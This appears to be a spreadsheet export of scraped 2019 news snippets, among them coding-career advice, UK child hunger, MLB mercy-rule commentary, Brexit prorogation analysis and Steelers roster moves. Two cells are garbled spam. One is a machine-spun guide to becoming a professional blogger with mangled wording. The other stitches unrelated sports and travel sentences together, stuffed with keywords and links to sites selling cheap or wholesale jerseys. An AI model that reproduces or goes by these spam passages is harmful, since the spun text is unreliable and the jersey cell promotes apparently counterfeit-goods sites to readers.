Longenecker, division president of Taylor Morrison Southwest Florida. “They also want to live and play within an inspiring location. Chris helps us deliver this goal.” Source link</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/NmFhpwmcLwI/best-tips-for-beginners-learning-to-code-programming-languages-2019-8 An entrepreneur whose company trained programmers at Facebook and Google shares his best advice for learning to code (FB, GOOG, GOOGL) The most important first step in learning how to code is to think about your area of interest and career goals, says Michael Ellison, founder and CEO of CodePath.org. Mobile app development is also an ideal introduction for newcomers since it’s a popular platform that most people are familiar with. But in order to succeed, you’ll need to set a goal beyond just wanting to land a high-salary and job security, Ellison says. Visit Business Insider’s homepage for more stories. With software developers ranking among the highest-paid and fastest-growing jobs in the United States, you might be motivated to consider switching your career path or learning how to code. In an analysis performed by CareerBuilder published on MarketWatch, software development jobs consistently places among the most lucrative career options in multiple states across the country. But getting into the industry can feel intimidating if you don’t have a background in computer science or a related field. Whether you have a technical background or not, Michael Ellison, founder and CEO of computer science education non-profit CodePath.org, says setting a goal is a critical first step. “If you’re building a career based on what you’re interested in, it’s going to be a lot more sustainable,” he recently told Business Insider. CodePath.org was born out of CodePath.com, a technical training company that has operated training and onboarding programs for Silicon Valley giants like Facebook, Google, Dropbox, Airbnb, and Netflix. The company has created more than 30 courses that have taught over 2,000 programmers, according to its website. Here’s Ellison’s best advice for learning how to code. SEE ALSO: WeWork just acquired a startup that converts empty New York and San Francisco restaurants into coworking spaces Don’t get into the industry just for a high salary or job security. Before deciding what programming language you might want to learn, think about your long-term career goals. “If you say, my goal is to have a job or make a lot of money, then it’s not going to be as motivating and potentially as rewarding and exciting and interesting for you to go down this learning path,” he said. He suggested setting a goal around building an app that solves a particular problem that you’re passionate about or interested in as a possible starting point. Read more: The founder sold his company to Amazon for $1 billion after being rejected on ‘Shark Tank.’ Here’s the one thing he said every startup needs to succeed. Consider your current attributes and how you can apply them toward a new career path. If your goal isn’t immediately clear, try thinking about what you’re already good at and what you enjoy most in your current role. Doing so can help you find your focus. Some examples of general attributes or areas of interest could include solving human problems, thinking about systems and optimization, and managing complexity, Ellison said. “The area of interest is more important initially than the technology and the tools, which are just really a means in order to get there,” he said. Start with mobile development as an introduction. Ellison suggests mobile app development as a starting point for a few reasons: it’s lucrative, it’s a familiar platform that most people use everyday, and it involves developing for a single form factor and operating system. Unlike full-stack or front-end development, focusing on developing something like an iPhone app can be much more simple. That’s because it involves developing for a single platform, meaning you won’t have to worry about accommodating as many different screen sizes or operating systems at first. “It’s just so relatable and it’s really straightforward to be able to plug in,” he said. “We love mobile as an introduction.” Apple’s Swift programming language for iOS is particularly accessible to newcomers, Ellison says. “You can use the same powerful tools that professional developers are using,” he said. “And you can feel like you’re doing a lot even though you don’t yet understand a lot.” Start building. Once you’ve learned the basics, one of the best ways to move forward is to start working on projects, especially with other people. “You really need to start building stuff and start working with other people as a prerequisite,” Ellison said. “And then, don’t worry so much about the actual technologies. Just get started.” Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/NmFhpwmcLwI/best-tips-for-beginners-learning-to-code-programming-languages-2019-8 The post An entrepreneur whose company trained programmers at Facebook and Google shares his best advice for learning to code (FB, GOOG, GOOGL) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>METHODS TO BE A SPECIALIST BLOGGER? There is hundreds of thousands of men and women in your daily life whom quit their work in order to be a blogger that is professional. For a few this choice is among the most readily useful choices they will have manufactured in their whole life. But additionally you can find those individuals for who it really is one of many worst decisions. Since becoming a specialist blogger all that’s necessary is some time lots of time. Therefore, before beginning one remember to think about each and every thing then determine correctly. It’s also possible to spend you to definitely do your essay for you. Then this is the right time if you are serious about starting your life as a professional blogger. Begin writing and begin focusing on your market plus one day so as to work that is hard off. right Here in this specific article we highlight some suggestions that help you then become a blogger that is professional. So, exactly what are you waiting to carefully read them and begin composing from now: Select an appealing topic: Write an interest that interests you. Needless to say your audiences are not here to know regarding the to day life stories instead they like to read something on the topic on which you are passionate day. Make a topic that is interesting attracts more audience. Figure out what you wish to compose? Know what interests you many, essays, viewpoints or reviews. Each writing design features a audience that is different. Prior to starting your blog that is own choose category which you find intriguing and stay with it. Viewpoints, blog sites would be the blog sites that attract readers that are political. Through reviews buyers that are potential decide if the item will work for them or perhaps not. Essays are anecdotes or tales which are relatable to your visitors. Choose a webpage: As a novice writer it really is must you start your career as a blogger for you to choose a website like Blogger or WordPress that help. These websites contain various tools and options that assistance you compose a blog that is perfect. Buy your domain name: you’ll have your domain that is own name around $15 per year of hosting through Hover or GoDaddy. The domain name provides you with a far more expert look and your market can very quickly access your posts simply by typing the domain title. When finalizing the domain title makes certain to decide on, it really is something which is not hard to gain access to. Write each day: give consideration to running a blog as a time job that is full. Needless to say your audience won’t wait for the web log for months, so it’s required to supply them with brand new and interesting content every single day. Make use of clear and concise post games: if you would like the blog read by maximum wide range of visitors, then it’s must to utilize clear and concise post games, to greatly help SEO search it easily. Utilizing expressions and keywords which are widely used escalates the presence for the post. Include images/videos: individuals frequently avoid reading big block. So that the most useful concept here’s to split up big obstructs into tiny chunks by utilizing pictures or custom paper writing videos pertaining to your subject. This can create your look that is content attractive well. Prevent writing a lot more than 2500 terms: 2500 term count could be the limitation of a reader to see in a single rest. Make certain each term you utilize makes a suitable feeling otherwise reader will stop reading and relocate to one other web log since it will starts bore them quickly. Improve the blog on social networking: Now a day’s social media marketing is just one of the most useful advertising platforms for numerous bloggers. Improve your website on various social networking platforms such as for example Facebook, Twitter and Instagram. This can help you create an audience that is large of. You are able to make use of “#” with various search relate solely to your subject on these platforms. That is a way that is best to boost your visitors and market your company. Generating revenue on blog requirements persistence: then make sure to keep in mind that you won’t be able to earn money on blog overnight if you are seeking to start your career as a professional blogger. It requires persistence and continues composing and marketing. The more content you compose, the greater amount of quickly you’ll be begin making cash. Write visitor articles: Besides composing for the very own blog additionally compose for any other web sites being a visitor post. By the end associated with the post you are able to also upload the blog, internet website link to make certain that people can find out a lot more of your blogs. Above would be the top 11 recommendations that help you create a expert writer since quickly that you can. Therefore, if you should be considering making blog posting as the occupation, then begins it as a component time task as making profits from blogging needs time and effort.</t>
  </si>
  <si>
    <t>Charities say half a million UK kids risk hunger as parents struggle to afford food over summer – Channel 4 News Original Source Half a million children across England are at risk of going hungry during the long summer holidays, when schools are closed and free school meals aren’t available. Charities say schemes to prevent children going short of food simply don’t have the resources to cope. The Government agreed to spend £9.1 million on pilot projects to help disadvantaged children during the school holidays. But figures obtained by this programme and the Guardian show that the vast majority of funding bids from the country’s most deprived areas were rejected. From Anja Popp and Tom Wall.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Charities say half a million UK kids risk hunger as parents struggle to afford food over summer – Channel 4 News appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Missing money, Danish side tables and a boardroom putsch; how financial scandal has split the women-only Lyceum Club.</t>
  </si>
  <si>
    <t>Let this front page serve as a reminder of how white supremacy is aided by – and often relies upon – the cowardice of mainstream institutions. https://t.co/ynjgtT66yI — Alexandria Ocasio-Cortez (@AOC) August 6, 2019 How dare the NY Times actually print a straight, non-Trump bashing headline! Via Twitchy: As Twitchy reported, the New York Times […]</t>
  </si>
  <si>
    <t>“I think that I bring a series of skills based on my background that will add value to the local government and I am prepared to use those skills in the best interest of Kalgoorlie-Boulder”</t>
  </si>
  <si>
    <t>MILLIONS of Android smartphones could soon receive a great iPhone feature – here’s what fans have to look forward to. Daily Express :: Tech Feed Android update: Millions of smartphones could soon receive this great iPhone feature</t>
  </si>
  <si>
    <t>Victoria: Mary Polak, BC Liberal House Leader and Langley MLA, is calling for answers about a $13,000 taxpayer-funded road trip by a Speaker’s office staffer – and demanding to know why John Horgan and the NDP aren’t doing the same. “At a July 3rd meeting of the Legislative Assembly Management Committee (LAMC), the Speaker confirmed Mr. Mullen’s trip and promised to provide a detailed itinerary. When he failed to do so, I sent a follow-up letter to the Speaker on July 12th. After more than a month with no response, today I sent him another letter with the same questions,” said Polak. “It is absolutely unacceptable that LAMC should learn about the costs of this road trip from media reports. Worse still, we now know that the Speaker’s hand-picked staffer didn’t even meet with the Speaker or Sergeant-at-Arms in Alberta, Saskatchewan, Manitoba or Ontario. Frankly, without a detailed itinerary, we have no idea what he was actually doing.” The BC Liberals are calling for a full and comprehensive account of who the Speaker’s staffer met with and a detailed breakdown of expenditures – a minimum standard they say the NDP should be requiring as well. “John Horgan and the NDP have continued to stand behind the Speaker and his staff,” added Polak. “British Columbians need to have confidence that taxpayer money is being spent wisely and with an appropriate level of oversight. John Horgan and the NDP need to step up and start demanding answers instead of acting as a rubber stamp.”</t>
  </si>
  <si>
    <t>The Queen has made an “unusual effort” in welcoming Meghan Markle into the royal family as she doesn’t want her to feel alienated like Princess Diana did, claims an expert.</t>
  </si>
  <si>
    <t>The toy maker Hasbro says it is introducing measures to ensure most of its packaging for its products is plastic-free by 2022.</t>
  </si>
  <si>
    <t>by Dan Sullivan Following the presentation by PharmaCann about medical cannabis in Virginia published here yesterday, the attendees were invited to ask questions. Unfortunately, there was not a microphone available for the audience participants. While the answers are clear in the video’s audio, some of the questions are not easily interpreted, so they are paraphrased below to provide context to the answers provided. Do you have a hybrid that removes the increase in appetite? Do the doctors prescribe the ratio or do they leave that up to the dispensary? In Virginia, not every physician can prescribe medical cannabis, is that correct? In Virginia every doctor that wants to recommend marijuana has to be registered. Comment – I heard that there might be a problem for physicians with Medicare and other federal programs who register … Are the plants grown in soil or is it hydroponic? Do pharmacist have to have additional training? You have the facility in Staunton. What about similar facilities elsewhere? Comment – I can tell you there is five: Manassas, Bristol, Portsmouth, and Richmond. How are people who live close to an hour away supposed to have access? Is there going to be delivery? I am going to ask the drug test question. Is this something that is going to show up on the drug test? Comment – That does bring up the question in regards to that. That person that needs it, they have registered, they talk to the employer, you know they are legally taking something for their benefit. Comment – One of the courts, I believe in Minnesota, ruled that it can disqualify you for the job even if you are registered. Comment – Virginia is a right to work state, so that hinders patient protection. How does this affect when you are driving a vehicle? If I travel from Virginia to another state and I get stopped along the road, what’s the law? How about operating a vehicle? Have the VA (Veterans Administration) doctors been in with any of this? Yes, I have my certificate already and I was wondering of you could give us an idea of when you are opening? Comment – Mike, maybe you could speak to even once we are operational then we have to start growing, because we can’t even put seed in the ground until we get that license. What about third party? State to state? New York can’t come down here? I am a current student at Virginia Tech and I was just wondering if PharmaCann was going to offer some kind of internship program? What’s the difference in the product you’ll be selling and what I can buy with my fried chicken at the Beverly street convenience store? Comment – Also you’d have to understand the quality of chicken you can get there. What are the qualifications you need to get a job with PharmaCann? Why can’t you help Tech and Virginia progress in their development of growers? How many jobs and have you anticipated growth? Can you give us a perspective of what it’s going to cost? Are the insurance companies on board? My nephew has Crohn’s like you and you say persons make cannabinoids and that people suffering from Crohn’s disease need them but there is no evidence of the body not making cannabinoids. So my nephew is a child and there is an effect on the developing brain. So the coalition is about getting young people not to use drugs. I mean you guys don’t want abuse either. So how would you hadle a patient like him who is younger, his brain is still developing, side effects could be more severe or long term. How would you handle that? Who’s the one doctor in Staunton? Comment – There’s a website called BuzzNutrition. On the website there’s a link that will take you to all the doctors in the state of Virginia who are licensed to prescribe a certificate. I can promise you there is more than one physician on this area and there are a ton of pediatricians at UVa who work with children who have epilepsy and things like that. Comment – That number goes up every day. As of yesterday I think there were 330 registered physicians. Is it $50 a certificate? Is that correct? At the end of the program there was an offer to pass any questions you make have on to Mike at PharmaCann using the coalition email address: tyreenm@ci.staunton,va.us</t>
  </si>
  <si>
    <t>Video posted on August 8 by Italy’s firefighting service shows firefighters in southwestern Italy rescuing a calf that had fallen off a cliff east of Naples. The video shows a ground crew securing the baby cow it before it is flown away to a soccer field to be released. Credit: Vigili del Fuoco via Storyful</t>
  </si>
  <si>
    <t>THE PS Plus free games available during August 2019 got a surprise boost this week as a new trial was added to the PlayStation Store. Daily Express :: Entertainment Feed PS Plus Free Games surprise: Big PS4 Download available now for PlayStation gamers</t>
  </si>
  <si>
    <t>Tim Benz: MLB mercy rule debate masks greater problem Original Source About an hour ago Give Pittsburgh Pirates play-by-play man Greg Brown credit for self-awareness. He’s right. No one wants to be “that guy.” The old guy yelling “get off my lawn” at any new idea that comes along. That’s how an aghast Brown couched his commentary against the suggestion of a Major League Baseball “mercy rule.” New York Yankees manager Aaron Boone advanced that idea recently, inferring that MLB may be better-served calling games before nine innings are done in blowout contests. You know, end the game with a 10-run deficit after seven innings or something. Kind of like beer-league softball rules after five. On 93.7 the Fan Sunday, Brown broached the topic with Pirates general manager Neal Huntington, stating that he “couldn’t believe Boone was serious.” “When do we stop?” Brown asked incredulously. “When do we take a breath and say, ‘This is the greatest game on earth, and tradition should count for something?’ Shouldn’t we keep the game mostly intact?” I like Brown. So hopefully, he doesn’t bristle at my characterization of him as a “traditionalist.” But, remember, Brown is a guy who is still battling a 46-year-old war against the designated hitter. Brown has gotten more mileage out of #BanTheDH than President Trump has gotten out of #BuildTheWall. So I think that description is fair. Huntington was far more diplomatic on the topic, stating he hadn’t heard Boone say that firsthand. Although I certainly got the impression Huntington agreed with Brown’s tone, frequently stating “we need to keep what makes this game great, but we need to grow, and evolve, and draw fans out.” The last part is vital, especially since Huntington also acknowledged, “Our attendance is declining. That’s real.” Wait. I thought “that’s real” was a Hurdle-ism. Doesn’t Clint have “that’s real” trademarked? Anyway, Huntington is more accurate than he probably wants to admit. A recent USA Today story states that “league-wide attendance is down about 800,000 compared with the same point last year. The final 2018 attendance – 69.7 million – was MLB’s lowest figure since 2003.” TV ratings were down 4% in the first half of the season, despite some first-place performances from big-market clubs such as the Los Angeles Dodgers, Chicago Cubs, and Yankees. The average length of a game this year is three hours, eight minutes. That’s a record high. So fewer people are going. Fewer people are watching. And Major League Baseball is making up for that… by making the games longer than ever?! Great formula they’ve got going there. Given those facts, I want to go back to Brown’s quote. First of all, “greatest game on earth”? Based on that data listed above, very few people would agree with that assertion. Secondly, “When do we stop?” Actually, the better question is, “Where do we start?” The warm-up clocks and between-innings clocks clearly aren’t working. Limiting mound visits isn’t working. We’re still battling over batter-minimums for pitchers and pitch clocks. You can’t argue balls and strikes anymore until, well, inevitably somebody does. Every move that has been made towards speeding up the game has been swatted away by instant replay and deeper pitch-counts to slow the game down again. Speeding up baseball seems to be a harder task than slowing down global warming. It’s constantly two steps forward and one step back. The biggest issue is probably the length of those long commercial breaks to bring in all that advertising revenue to pay the players. You know, on the game broadcasts no one watches anymore. Yeah. Scratch your head over that one for a while. If Brown and other traditionalists don’t want a mercy rule, I get it. Why just baseball, right? Every other sport is dealing with the same issues, and no one is talking about stopping NHL games with a five-goal lead or NFL games at a 28-point margin in the fourth quarter. Plus, those fluky blowout games aren’t the problem. Those tickets have already been bought, or they haven’t. And viewers have already turned on their televisions, or they haven’t. The issue is, how do you get ticket buyers and viewers to come for the first inning and stay for a close game, not necessarily how do you keep them through the seventh in a runaway. The funny kicker to this discussion, though? Boone didn’t tackle this topic in regards to fan interest. He did so more in terms of perceived sportsmanship propriety, and ending games early so that bullpen arms could be protected while making sure position players didn’t have to pitch. Ironically, a few minutes later in his interview with Huntington, Brown found himself asking why a starting pitcher — Trevor Williams — was lifted from a recent game after allowing only three hits in six shutout innings. Maybe shifts in traditionalism aren’t always about rules that are written down, eh? Tim Benz is a Tribune-Review staff writer. You can contact Tim at [email protected] or via Twitter. All tweets could be reposted. All emails are subject to publication unless specified otherwise. TribLIVE’s Daily and Weekly email newsletters deliver the news you want and information you need, right to your inbox. More Breakfast With Benz Stories (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.8&amp;appId=1803959416547735”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’)); // ShareThis var switchTo5x = true; stLight.options( publisher: “50508235-28f9-448d-bea5-43ba84a886db”, doNotHash: false, doNotCopy: false, hashAddressBar: false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Tim Benz: MLB mercy rule debate masks greater problem appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Kristie Kellahan</t>
  </si>
  <si>
    <t>At a tiny remote school, this principal enjoys a true sense of community, writes Kristie Kellahan.</t>
  </si>
  <si>
    <t>Faye Brookes, who plays Kate Connor in Coronation Street, has split up with her fella, singer...</t>
  </si>
  <si>
    <t>The brother of Maria Stubbings, who was murdered in 2008, is awarded £20,000 of a £900,000 claim. Read more? Click here</t>
  </si>
  <si>
    <t>Daniel Keane And Stacey Lee</t>
  </si>
  <si>
    <t>The bodies of two climbing partners who fell to their deaths from a remote cliff face in South Australia's Flinders Ranges were discovered with the help of an aerial drone, one of the men's friends has revealed.</t>
  </si>
  <si>
    <t>🎵 Stream → https://fanlink.to/catacombs MA Spotify → https://spoti.fi/2GzF694 MA Discord → https://discord.gg/R8Z7xwA Genre: #BassHouse #Relique Follow → Relique https://www.facebook.com/reliquedj Follow → Most Addictive https://www.instagram.com/most_addictive https://www.facebook.com/mostaddictivemusic Tweets by mostaddictive © Eph'D Up The post Relique – Damn Sir appeared first on Dubster.</t>
  </si>
  <si>
    <t>Essendon must either sign John Worsfold to a long term deal or move forward with a new coach, according to AFL goal kicking great Brian Taylor.</t>
  </si>
  <si>
    <t>by Laura Jane Cohen Yesterday, my opponent sent out an email that should be addressed. As a former teacher, I’m disappointed that a School Board member would put such little effort into her work, and so I decided to correct and grade it. Poor grammar and sentence structure as well as spelling mistakes aren’t the only reason that I give this email a failing grade. It’s surprising that a School Board member who is currently 3 weeks late in filing her June 30th finance report is sending a fundraising email. It’s very disappointing that she doesn’t model the kind of behavior we expect from our students. The real problems with this email begin once you do even minimal fact checking, something we expect of our FCPS students. Our School Board Member’s outrage appears to stem from two major points: 1) The idea that we would provide feminine hygiene products to elementary school children. In fact, she highlights that point 3 separate times. On average, girls start their period at 12 years old, so, yes, Mrs. Schultz, that means 4th, 5th, and 6th graders in elementary schools have periods! 2) The idea that a school would provide “free” supplies in the bathroom instead of the health clinic. In fact, she argues that “simply” walking to the health clinic works to build, “self-sufficient, resilient young women in society”. As any teacher can tell you, the process of a student going to the health clinic is anything but simple or discreet and certainly doesn’t help build self-esteem. Other jurisdictions, even in Virginia, have been able to address this issue with more compassion and insight than our school board member cares to give. Mrs. Schultz continues to state that she doesn’t know what equity means, and emails like she sent yesterday confirm that. Please consider donating to help us make sure that all students get the resources they need to thrive in FCPS: https://secure.actblue.com/donate/ljc-2019q3 We win this together, Laura Jane</t>
  </si>
  <si>
    <t>The man accused of carrying out last weekend’s deadly mass shooting at a Walmart in the Texas border city of El Paso confessed to officers while he was surrendering and later explained that he had been targeting Mexicans, authorities say. CBC | World News</t>
  </si>
  <si>
    <t>I have Master Degree in Business Management, MBA. I’ve also completed studies in University in Business Administration. My courses in both of these programs have given me strong background knowledge in the concepts needed to business, commerce and management. I have worked in Ecuador in the area of Administrative and Financial Management and Area of .. Read more</t>
  </si>
  <si>
    <t>The Motorola One Zoom’s rumored quad rear camera may get a 5x hybrid telephoto lens and depth-measuring Time of Flight sensor, according to a new leak. The phone will pack a 6.2-inch Super AMOLED display with FHD+ (1080p) and have an in-display fingerprint sensor, according to info courtesy of noted leaker Arshan Agarwal via MySmartPrice. He also passed along additional renders of the phone: Confirming earlier leaks, clarifying the name While some of the details confirm what was first revealed in a previous leak, including running on 4GB of RAM and 128GB of storage along with a Snapdragon 675 processor, the new report is the first we’ve he… TechRadar – All the latest technology news The post Motorola One Zoom leak reveals quad-camera specs appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>NASA is investigating the first alleged criminal activity in space. But how will they weigh the evidence? 0 0</t>
  </si>
  <si>
    <t>Tannadice is set to be a sell-out for the first Dundee derby of the season</t>
  </si>
  <si>
    <t>U.S. Home | Mail Online MailOnline - get the latest breaking news, celebrity photos, viral videos, science &amp; tech news, and top stories from MailOnline and the Daily Mail newspaper. Woman burned down man's New Jersey house after 4am booty call Sunday 18 August 2019 08:38 PM UTC-05 Taija Russell, 29, was arrested last week after she allegedly torched the man's home in Woodbury, New Jersey in the early hours of August 4.</t>
  </si>
  <si>
    <t>Jordan McArdle</t>
  </si>
  <si>
    <t>Caretaker David Hale hasn’t ruled out putting his hand up to become Fremantle’s next permanent coach, but is trying not to look further ahead than Sunday’s season finale against Port Adelaide.</t>
  </si>
  <si>
    <t>Police say the 12-year-old is in a life-threatening condition following the “catastrophic incident”. Read more? Click here</t>
  </si>
  <si>
    <t>Archie Unlimited lets you read thousands of digital comics (with new issues added every week!) for one low monthly price, right on the Archie Comics App! Check out the list below to see the new comic books just added for your reading pleasure and click the images to open the books in the Archie Comics App! New to Archie Unlimited – 8/19/19 Archie Milestones Digest #1 Archie &amp; Me Digest #15 Archie’s Girls Betty &amp; Veronica #5 Archie’s Girls Betty &amp; Veronica #6 Jughead: The Hunger #12 Sabrina the Teenage Witch (1971-1983) #5 Sabrina the Teenage Witch (1971-1983) #6 and more…. Source: New to Archie Unlimited – 8/19/19 – Archie Comics The post New to Archie Unlimited – 8/19/19 – Archie Comics appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>Stephen Bush</t>
  </si>
  <si>
    <t>The British constitution, in reality, has just one rule: if you have a majority in Parliament, you can do what you want. Most of the time, our antiquated electoral system produces a majority for the government of the day, even though no government since 1935 has managed to command a majority of the vote. That means, for the most part, the ruling party can do whatever it wants – provided it is not internally divided. The long-term effect is that even a government like our own, which does not have a majority in Parliament, still retains a considerable degree of control over how Parliament runs its affairs. Now Boris Johnson has used that power to suspend – or, in the unnecessarily arcane language that surrounds everything to do with British politics, “prorogue” – Parliament for 33 days between 11 September and 14 October. It reduces the time that MPs have to legislate to prevent a no-deal Brexit, by cutting seven days off the legislative timetable. While the government public justification is that that this is because the parliamentary session has rattled on for far too long, the real reason is to reduce the amount of time MPs have to shape the Brexit process. A no-deal Brexit is still not inevitable But the reality is that Parliament still has enough time to legislate to force the government’s hand. It took MPs just a day to pass a backbench bill, tabled by Yvette Cooper, into law in March. And even accounting for delays in the House of Lords, there is sufficient time to do that again. What MPs do not have time to do is to perform their usual Brexit dance, of loudly complaining about something the government is doing, voting for it by a narrow margin after receiving some hollow promises and then, finally and belatedly, voting for it the second or third time around. Former prime minister John Major also prorogued parliament (Photo by Jack Taylor/Getty Images) While Johnson is abusing his power, he is not even the first Conservative Prime Minister to do so in modern times. John Major did the same thing in the run-up to the 1997 election, proroguing Parliament early in order to avoid embarrassing questions over the cash-for-access scandal. And in this case, MPs were offered an opportunity to stop Johnson in his tracks by Jeremy Corbyn in June, who tried and failed to pass an amendment giving MPs the opportunity to take control of the legislative agenda. The reason why MPs have been so half-hearted is because those who want to stop no-deal Brexit also want to avoid the blame for stopping it. These two projects don’t neatly map onto one another. How can a no-deal Brexit be stopped? Ultimately there are only two guaranteed ways to prevent the United Kingdom from leaving the European Union without a deal. The first is to leave with a deal – although Parliament has consistently rejected not only the current deal on the table, but any possible deal. The second is not to leave – which Parliament has also consistently rejected. The only positive vote that Parliament has ever cast was to start the Brexit clock ticking, when it triggered Article 50 back in 2017 without first placing any conditions or limitations on the Government. Since then, MPs have launched a variety of half-hearted and cobbled-together schemes to stop a no-deal Brexit – while getting ever closer to it. People protest the suspension of Parliament (Photo: Peter Summers/Getty Images) Now, thanks to Johnson’s power grab, they have at least no excuses left: MPs have a little over a week to stop a no-deal Brexit and a limited number of ways to do so. Now they must decide what they are willing to do to prevent it – something they needed to have done by 31 October in any case. That almost certainly wasn’t the Prime Minister’s intention, but it is nonetheless the effect. Although Johnson has moved the moment of reckoning closer, ultimately, that is the only important change: that MPs can no longer pretend to themselves that they aren’t in the last chance saloon. Stephen Bush is political editor of the New Statesman More from Stephen Bush Boris Johnson is asking EU for the impossible over Irish backstop Corbyn's plan is ridiculous, but Swinson has fallen into the trap Is the government bluffing about a no-deal Brexit? However liberal he proves to be, Boris Johnson will never be trusted Boris Johnson's Cabinet is the one Jeremy Corbyn would have chosen How a no deal Brexit can still happen, even if most MPs are against it The post MPs can still block no-deal Brexit, and proroguing Parliament could force them to do it appeared first on inews.co.uk. The post MPs can still block no-deal Brexit, and proroguing Parliament could force them to do it appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>13 – What’s next for James? These flourishes are also on display in the accommodations, which marry Tuscan-inspired decor with modern amenities like LCD TVs and Nespresso machines. Even later today I’m going to go hang out with them, so I’m sure we’ll all talk football then. NHL Hockey Jerseys Two goals in eight seconds from the Red Wings in the opening minutes of the third period stunned the B’s, who dropped their second game in as many days, falling 6 to Detroit on Sunday night at Little Caesars Arena. Due to his prowess as an IDP, this potential injury could hinder his prospects to begin the regular season. Outside the rooms, guests can grab Hungarian dishes and coffee throughout the day at the Patisserie &amp; Café or Nike NFL Jerseys Wholesale savor international cuisine at the Brasserie &amp; Bar. Once one of the most luxurious, legendary cruise liners of the seas, the QE2 Cheap Jerseys is now permanently docked in Dubai’s Mina Rashid and finally opened in 2018, after a 10-year restoration process, as a luxury hotel. Started in the late 1920s as a poinsettia farm, Carlsbad Ranch has become Southern California’s largest bulb farm. He’s once again battling for a roster spot this offseason, so the injury could be a blow to the tight end’s chances if it keeps him off the field for an extended period. On and on I will go, picturing those L.A. Today, the stark remains of this massive gathering place are thought-provoking. We know what you’re thinking: Why would somebody ever buy a bunch http://www.ravensofficialauthentic.com/Mark-Ingram-Ii-Jersey.html of miles? It just depends on, from week to week, which packages we have up. The Golden Knights play their next three games at home and seven of the next nine. Tyler Bertuzzi dug a puck out of the corner and fed it out to Niklas Kronwall, who NHL Jerseys Wholesale dished a slot pass to Mantha for another one-timer that caught the post and found twine for a power play marker with one second remaining in the period. 04 2019 by RotoWire Staff | RotoWire Angels’ Cody Allen: Gets vote of confidence. NHL Jerseys Wholesale See: Traveling during your third trimester. Best location: Dartmoor National Park Best time: May. He’s a special player and I’m certainly glad we have him. Re-signed with the Redskins on March 19… Brandon Carlo tactfully lofted a long pass to A.J. Brown Youth jersey Marchand to spark a 2-on-1 with Patrice Bergeron. — More AP NBA: https: tag NBA and https: AP-Sports Copyright 2018 by AP. We are able to put some parameters on it in terms of the timing of when the interviews are going to take place. Farther east in the Columbia River Gorge, one of the consequences of the river’s power-generating capabilities lies hidden below the waterline. Just eight ticks later, Hirose gave the Red Wings the lead. It’s unclear if that will be enough to guarantee his availability for Week 11, but Perry will mostly be relegated to special-teams duties if he ends up playing. New England scored touchdowns on its first four possessions of the game, which effectively forced the Chargers Cheap Jerseys to abandon the run. LAPD chief Michel Moore said on Tuesday that Holder and Hussle got into a dispute at the clothing store. Detroit led in shots 9. Unfortunately, long lines that suck an hour out of Mark Ingram II Youth jersey your day tend to be part of the experience. Dres Anderson, Seantavius Nike NFL Jerseys Wholesale Jones, Justice Liggins, James Wright, Kolby Listenbee and DeAndre Smelter will all look to get noticed and make Baseball Jerseys Custom a mark on the 2018 Colts roster. The 300-yard passing effort was the second of his career and his first since Oct. Detroit led in shots 9. Another NHL Hockey Jerseys example of the family’s immense wealth now open to the public, 500-acre Mount Cuba is the former home of Lammot du Pont Copeland and Pamela Cunningham Copeland. Orlando came in off as season-best 29-point win over http://www.nfltitansofficial.com/Aj-Brown-Jersey.html Toronto. isn’t practicing Wednesday due to a knee injury, Armando Salguero of the Miami Herald reports. Also recorded a special teams tackle. Gordon had 20 points when he took a seat on the bench with 3 left in the period. Beal Baseball Jerseys Custom also posted a career best in points . The Bruins could not have had a worse start to the third period, allowing two goals eight seconds apart within the first two minutes of the period to find themselves in a 4 hole. jerseys from china nike nfl jerseys cheap http://seoasysta.pl/seven-people-have-and-turning-use-gives-assists-colin-wilson-authentic-jersey/ http://cgsland.com/gained-total-just-down-competitive-cheap-jerseys-from-china/</t>
  </si>
  <si>
    <t>Jeff Hanisch-USA TODAY Sports With the season ending-injury to Lavon Hooks, the Steelers use the vacated roster spot for depth at outside linebacker The Steeler have signed former Green Bay Packers’ outside linebacker Jayrone Elliott to their 91-man roster on Thursday. We have signed LB Jayrone Elliott &amp; waived/injured DE Lavon Hooks. — Pittsburgh Steelers (@steelers) August 22, 2019 Out of the University of Toledo, Elliott signed as an undrafted free agent with Green Bay in 2014. Over three seasons with the Packers, Elliott appeared in 38 games and tallied 47 tackles, one fumble, one interception, and four sacks. Traded to the Dallas Cowboys at the end of the preseason in 2017 for a seventh-round draft pick, Elliott only lasted two games on the roster before being released by the Cowboys. Elliott signed with the New Orleans Saints in 2018, but failed to make the 53 man roster. With three accrued NFL seasons, Elliott was no longer eligible for the practice squad. Earlier in 2019, Elliot signed in the off-season with the Miami Dolphins but was released prior to training camp. In his four years at Toledo, Elliot amassed 70 tackles, an interception, and a fumble recovery. Elliot also tallied 16 sacks in his career, nine of which came during his senior season in 2013. While he joins former Toledo Rockets Olasunkanmi Adeniyi, Tuzar Skipper, and Diontae Johnson on the current Steelers roster, Elliott had already entered the NFL before any of his fellow former Rockets had arrived at Toledo. Elliott joins the Steelers after the unfortunate season-ending Achilles injury to Levon Hooks who was waived/injured on Thursday. Once Hooks clears waivers, an injury settlement will be forthcoming from the Steelers. Stay tuned to Behind The Steel Curtain for all your latest news on injuries, roster changes, and all things Pittsburgh Steelers.</t>
  </si>
  <si>
    <t>Illustrator and animator Eric Lobbecke's latest Work In Progress on plane flights for The Weekend Australian Review.</t>
  </si>
  <si>
    <t>MOST ordinary Australians love sport, but politicians are especially captivated by mega-sporting events.</t>
  </si>
  <si>
    <t>Former champion Samantha Stosur will contest a 15th US Open after being handed a wildcard into tennis' final grand slam of the year.</t>
  </si>
  <si>
